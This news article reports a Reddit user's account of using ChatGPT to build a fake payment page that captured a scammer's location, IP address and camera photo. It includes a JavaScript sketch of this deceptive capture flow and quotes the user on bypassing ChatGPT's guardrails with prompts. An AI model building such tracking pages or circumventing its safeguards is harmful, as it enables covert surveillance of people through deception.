How an AI Wiz Used ChatGPT to Turn the Tables on a Scammer

Decrypt
1 hour ago

When a message popped up on his phone from a number claiming to be from a former college contact, a Delhi-based information technology professional was initially intrigued. The sender, posing as an Indian Administrative Service officer, claimed a friend in the paramilitary forces was being transferred and needed to liquidate high-end furniture and appliances "dirt cheap."


It was a classic "army transfer" fraud, a pervasive digital grift in India. But instead of blocking the number or falling victim to the scheme, the target claims that he decided to turn the tables using the very technology often accused of aiding cybercriminals: artificial intelligence.


Scamming a scammer


According to a detailed account posted on Reddit, the user, known by the handle u/RailfanHS, used OpenAI’s ChatGPT to "vibe code" a tracking website. The trap successfully harvested the scammer's location and a photograph of his face, leading to a dramatic digital confrontation where the fraudster reportedly begged for mercy.


While the identity of the Reddit user could not be independently verified, and the specific individual remains anonymous, the technical method described in the post has been scrutinized and validated by the platform's community of developers and AI enthusiasts.


The incident highlights a growing trend of "scambaiting"—vigilante justice where tech-savvy people bait fraudsters to waste their time or expose their operations—evolving with the aid of generative AI.


The encounter, which was widely publicized in India, began with a familiar script. The scammer sent photos of goods and a QR code, demanding an upfront payment. Feigning technical difficulties with the scan, u/RailfanHS turned to ChatGPT.


He fed the AI chatbot a prompt to generate a functional webpage designed to mimic a payment portal. The code, described as an "80-line PHP webpage," was secretly designed to capture the visitor's GPS coordinates, IP address, and a front-camera snapshot.


The tracking mechanism relied on social engineering as much as on any software exploit. Browsers block silent access to the camera and location, so the user told the scammer to upload the QR code to the site himself, supposedly to "expedite the payment process." When the scammer visited the site and clicked the upload button, the browser prompted him to allow camera and location access, and he unwittingly granted both permissions in his haste to secure the funds.
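The post does not include the actual script, but the permission-gated flow it describes can be sketched in browser JavaScript. Everything specific here is an illustrative assumption, not the poster's code: the `upload-btn` element, the `/log.php` endpoint, and the `buildReport` helper are invented for the example; only `getCurrentPosition` and `getUserMedia` are real browser APIs, and both show a permission prompt rather than capturing silently.

```javascript
// Sketch of the permission-gated capture flow described in the post.
// Key point: browsers only surface geolocation/camera prompts in a secure
// (HTTPS) context, so the "upload your QR code" button is the social hook.

// Pure helper, runnable anywhere: package captured data for the server.
function buildReport(lat, lon, ip) {
  return { lat, lon, ip, capturedAt: new Date().toISOString() };
}

// Browser-only wiring; skipped outside a browser (e.g. under Node).
if (typeof document !== "undefined") {
  document.getElementById("upload-btn").addEventListener("click", () => {
    // 1. The click counts as a user gesture; the geolocation prompt appears.
    navigator.geolocation.getCurrentPosition(async (pos) => {
      // 2. getUserMedia triggers the camera permission prompt.
      const stream = await navigator.mediaDevices.getUserMedia({
        video: { facingMode: "user" },
      });
      // 3. A frame from `stream` would be drawn to a <canvas> and POSTed,
      //    with the coordinates, to a logging endpoint (hypothetical path):
      fetch("/log.php", {
        method: "POST",
        headers: { "Content-Type": "application/json" },
        body: JSON.stringify(
          buildReport(pos.coords.latitude, pos.coords.longitude, null)
        ),
      });
      stream.getTracks().forEach((t) => t.stop()); // release the camera
    });
  });
}
```

Note that the visitor's IP address would not be collected client-side at all: the server simply reads it from the incoming HTTP request, which is presumably what the "80-line PHP webpage" did.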



Image: RailfanHS on Reddit

"Driven by greed, haste, and completely trusting the appearance of a transaction portal, he clicked the link," u/RailfanHS wrote in the thread on the r/delhi subreddit. "I instantly received his live GPS coordinates, his IP address, and, most satisfyingly, a clear, front-camera snapshot of him sitting."


The retaliation was swift: the IT professional sent the harvested data back to the scammer. The effect, according to the post, was immediate panic. The fraudster flooded the user with calls, followed by messages pleading for forgiveness and promising to abandon his life of crime.


"He was now pleading, insisting he would abandon this line of work entirely and desperately asking for another chance," RailfanHS wrote. "Needless to say, he would very well be scamming someone the very next hour, but boy the satisfaction of stealing from a thief is crazy."


Redditors verify the approach


While dramatic tales of internet justice often invite skepticism, the technical underpinnings of this sting were verified by other users in the thread. A user with the handle u/BumbleB3333 reported successfully replicating the "dummy HTML webpage" using ChatGPT. They noted that while the AI has guardrails against creating malicious code for silent surveillance, it readily generates code for legitimate-looking sites that request user permissions—which is exactly how the scammer was trapped.


"I was able to make a sort of a dummy HTML webpage with ChatGPT. It does capture geolocation when an image is uploaded after asking for permission," u/BumbleB3333 commented, confirming the plausibility of the hack. Another user, u/STOP_DOWNVOTING, claimed to have generated an "ethical version" of the code that could be modified to function similarly.


The original poster, who identified himself in the comments as an AI product manager, acknowledged that he had to use specific prompts to bypass some of ChatGPT's safety restrictions. "I'm sort of used to bypassing these guardrails with right prompts," he noted, adding that he hosted the script on a virtual private server.


Cybersecurity experts caution that while such "hack-backs" are satisfying, they operate in a legal grey area and can carry risks of their own. Still, it's pretty tempting—and makes for quite a spectator sport.


